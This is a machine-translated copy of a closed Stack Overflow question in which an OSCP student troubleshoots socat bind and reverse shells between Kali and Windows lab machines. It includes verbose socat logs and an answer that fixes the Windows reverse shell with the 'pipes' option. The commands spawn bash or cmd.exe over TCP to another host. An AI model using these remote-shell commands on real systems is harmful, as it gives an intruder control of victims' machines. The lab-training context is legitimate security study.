关闭。这个问题不符合Stack Overflow guidelines .它目前不接受答案。
想改进这个问题?将问题更新为 on-topic对于堆栈溢出。
2年前关闭。
Improve this question
我最近升级了我的 OSCP Material 以获得新的 OSCP 版本 2020,并且我遇到了使用 socat 创建加密绑定(bind) shell/反向 shell 的章节。我以为我知道如何使用它,但是我尝试从我的 Windows 机器向我的 Kali 机器发送一个加密的反向 shell 没有成功。我决定在双方都使用未加密的绑定(bind) shell 进行一些试验和错误。
这对我有用:
这对我不起作用:
这是我所做的:
Kali 绑定(bind) shell -OK
卡利 (192.168.119.145)
socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash Windows 10 (192.168.145.10)socat -d -d -d - TCP4:192.168.119.145:4444 Kali 反向 shell -OK Windows 10 (192.168.145.10)
socat -d -d -d TCP4-LISTEN:4444,fork STDOUT卡利 (192.168.119.145)socat -d -d -d TCP4:192.168.145.10:4444 EXEC:/bin/bash Windows 绑定(bind) shell - 不正常 Windows 10 (192.168.145.10)
socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe卡利 (192.168.119.145)socat -d -d -d - TCP4:192.168.145.10:4444 Windows 反向 shell - 不正常 卡利 (192.168.119.145)
socat -d -d -d TCP4-LISTEN:4444,fork STDOUT Windows 10 (192.168.145.10)socat -d -d -d TCP4:192.168.119.145:4444 EXEC:cmd.exe 这是我得到的:Windows 绑定(bind) shell - Windows 机器
C:\Windows\system32>socat -d -d -d TCP4-LISTEN:443,fork EXEC:cmd.exe
2020/02/18 10:22:04 socat[3712] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 10:22:04 socat[3712] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 10:22:04 socat[3712] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2020/02/18 10:22:04 socat[3712] I setting option "fork" to 1
2020/02/18 10:22:04 socat[3712] I socket(2, 1, 6) -> 5
2020/02/18 10:22:04 socat[3712] I starting accept loop
2020/02/18 10:22:04 socat[3712] N listening on AF=2 0.0.0.0:443
2020/02/18 10:22:25 socat[3712] I accept(5, {2, AF=2 192.168.119.145:36796}, 16) -> 6
2020/02/18 10:22:25 socat[3712] N accepting connection from AF=2 192.168.119.145:36796 on AF=2 192.168.145.10:443
2020/02/18 10:22:25 socat[3712] I permitting connection from AF=2 192.168.119.145:36796
2020/02/18 10:22:25 socat[3712] N forked off child process 4252
2020/02/18 10:22:25 socat[4252] I just born: child proces2020/02/18 10:22:25 socat[3712] I close(6)
2020/02/18 10:22:25 socat[4252] I just born: child process 4252
2020/02/18 10:22:25 socat[4252] I close(5)stening
2020/02/18 10:22:25 socat[4252] N forking off child, using socket for reading and writing
2020/02/18 10:22:25 socat[4252] I socketpair(1, 1, 0, {5,7}) -> 0
2020/02/18 10:22:25 socat[4252] N forked off child process 56402020/02/18 10:22:25 socat[5640] I just born: child proces
2020/02/18 10:22:25 socat[4252] N forked off child process 5640
2020/02/18 10:22:25 socat[5640] I close(5)
2020/02/18 10:22:25 socat[5640] I dup2(7, 0) -> 0
2020/02/18 10:22:25 socat[5640] I dup2(7, 1) -> 1ened all sock addresses
2020/02/18 10:22:25 socat[5640] I close(7) data transfer loop with FDs [6,6] and [5,5]
2020/02/18 10:22:25 socat[5640] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
2020/02/18 10:22:25 socat[4252] W read(5, 0x20044610, 8192): Connection reset by peer
2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 202020/02/18 10:22:25 socat[4252] I childdied(signum=20)
2020/02/18 10:22:25 socat[4252] I waitpid(): child 5640 exited with status 0
2020/02/18 10:22:25 socat[4252] I childdied() finishedANG): No child processes
2020/02/18 10:22:25 socat[4252] N socket 2 to socket 1 is in error
2020/02/18 10:22:25 socat[4252] N socket 2 (fd 5) is at EOF
2020/02/18 10:22:25 socat[4252] I shutdown(6, 1)
2020/02/18 10:22:25 socat[4252] I terminated child did not leave data for us
2020/02/18 10:22:25 socat[4252] I poll timed out (no data within 0.500000 seconds)
2020/02/18 10:22:25 socat[4252] I shutdown(6, 2)
2020/02/18 10:22:25 socat[4252] I shutdown(5, 2)
2020/02/18 10:22:25 socat[4252] N exiting with status 0
2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 20
2020/02/18 10:22:25 socat[3712] I childdied(signum=20)
2020/02/18 10:22:25 socat[3712] I childdied(20): cannot identify child 4252
2020/02/18 10:22:25 socat[3712] I waitpid(): child 4252 exited with status 0
2020/02/18 10:22:25 socat[3712] I waitpid(-1, {}, WNOHANG): No child processes
2020/02/18 10:22:25 socat[3712] I childdied() finished
root@kali:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d - TCP4:192.168.145.10:443
2020/02/18 13:22:24 socat[9004] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 13:22:24 socat[9004] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/)
2020/02/18 13:22:24 socat[9004] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2020/02/18 13:22:24 socat[9004] N reading from and writing to stdio
2020/02/18 13:22:24 socat[9004] N opening connection to AF=2 192.168.145.10:443
2020/02/18 13:22:24 socat[9004] I starting connect loop
2020/02/18 13:22:24 socat[9004] I socket(2, 1, 6) -> 5
2020/02/18 13:22:24 socat[9004] N successfully connected from local address AF=2 192.168.119.145:36796
2020/02/18 13:22:24 socat[9004] I resolved and opened all sock addresses
2020/02/18 13:22:24 socat[9004] N starting data transfer loop with FDs [0,1] and [5,5]
2020/02/18 13:22:25 socat[9004] N socket 2 (fd 5) is at EOF
2020/02/18 13:22:25 socat[9004] I poll timed out (no data within 0.500000 seconds)
2020/02/18 13:22:25 socat[9004] I shutdown(5, 2)
2020/02/18 13:22:25 socat[9004] N exiting with status 0
root@kali:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d TCP4-LISTEN:443 STDOUT
2020/02/18 13:07:13 socat[8925] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 13:07:13 socat[8925] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 13:07:13 socat[8925] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2020/02/18 13:07:13 socat[8925] I socket(2, 1, 6) -> 5
2020/02/18 13:07:13 socat[8925] I starting accept loop
2020/02/18 13:07:13 socat[8925] N listening on AF=2 0.0.0.0:443
2020/02/18 13:07:18 socat[8925] I accept(5, {2, AF=2 192.168.145.10:61633}, 16) -> 6
2020/02/18 13:07:18 socat[8925] N accepting connection from AF=2 192.168.145.10:61633 on AF=2 192.168.119.145:443
2020/02/18 13:07:18 socat[8925] I permitting connection from AF=2 192.168.145.10:61633
2020/02/18 13:07:18 socat[8925] I close(5)
2020/02/18 13:07:18 socat[8925] N using stdout for reading and writing
2020/02/18 13:07:18 socat[8925] I resolved and opened all sock addresses
2020/02/18 13:07:18 socat[8925] N starting data transfer loop with FDs [6,6] and [1,1]
2020/02/18 13:07:18 socat[8925] N socket 1 (fd 6) is at EOF
2020/02/18 13:07:18 socat[8925] I poll timed out (no data within 0.500000 seconds)
2020/02/18 13:07:18 socat[8925] I shutdown(6, 2)
2020/02/18 13:07:18 socat[8925] N exiting with status 0
C:\Windows\system32>socat -d -d -d TCP4:192.168.119.145:443 EXEC:cmd.exe
2020/02/18 10:06:39 socat[5396] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 10:06:39 socat[5396] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 10:06:39 socat[5396] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2020/02/18 10:06:39 socat[5396] N opening connection to AF=2 192.168.119.145:443
2020/02/18 10:06:39 socat[5396] I starting connect loop
2020/02/18 10:06:39 socat[5396] I socket(2, 1, 6) -> 5
2020/02/18 10:06:39 socat[5396] N successfully connected from local address AF=2 192.168.145.10:61630
2020/02/18 10:06:39 socat[5396] N forking off child, using socket for reading and writing
2020/02/18 10:06:39 socat[5396] I socketpair(1, 1, 0, {6,7}) -> 0
2020/02/18 10:06:39 socat[5396] N forked off child process 2688
2020/02/18 10:06:39 socat[2688] I just born: child process 2688
2020/02/18 10:06:39 socat[5396] N forked off child process 2688
2020/02/18 10:06:39 socat[5396] I close(7)
2020/02/18 10:06:39 socat[5396] I resolved and opened all sock addresses
2020/02/18 10:06:39 socat[5396] N starting data transfer loop with FDs [5,5] and [6,6]
2020/02/18 10:06:39 socat[2688] I close(6)
2020/02/18 10:06:39 socat[2688] I dup2(7, 0) -> 0
2020/02/18 10:06:39 socat[2688] I dup2(7, 1) -> 1
2020/02/18 10:06:39 socat[2688] I close(7)
2020/02/18 10:06:39 socat[2688] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
2020/02/18 10:06:39 socat[5396] W read(6, 0x20044228, 8192): Connection reset by peer
2020/02/18 10:06:39 socat[5396] N childdied(): handling signal 20
2020/02/18 10:06:39 socat[5396] I childdied(signum=20)
2020/02/18 10:06:39 socat[5396] I exec'd process 2688 on socket 1 terminated
2020/02/18 10:06:39 socat[5396] I waitpid(): child 2688 exited with status 0
2020/02/18 10:06:39 socat[5396] I waitpid(-1, {}, WNOHANG): No child processes
2020/02/18 10:06:39 socat[5396] I childdied() finished
2020/02/18 10:06:39 socat[5396] N socket 2 to socket 1 is in error
2020/02/18 10:06:39 socat[5396] N socket 2 (fd 6) is at EOF
2020/02/18 10:06:39 socat[5396] I shutdown(5, 1)
2020/02/18 10:06:39 socat[5396] I terminated child did not leave data for us
2020/02/18 10:06:39 socat[5396] I poll timed out (no data within 0.500000 seconds)
2020/02/18 10:06:39 socat[5396] I shutdown(5, 2)
2020/02/18 10:06:39 socat[5396] I shutdown(6, 2)
2020/02/18 10:06:39 socat[5396] N exiting with status 0
为什么我不能将 Windows cmd.exe 进程附加到套接字?
PS:我知道我的示例之间的时间戳不匹配
最佳答案
要从 Windows 获取反向 shell,请在末尾添加“管道”命令:
例子:
卡利盒:
socat TCP4-LISTEN:443,fork STDOUT
window 盒:
socat -d -d TCP4:192.168.X.X:443 EXEC:'cmd.exe',管道
关于linux - Socat - 如何创建一个 Windows 反向 shell ,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/60287549/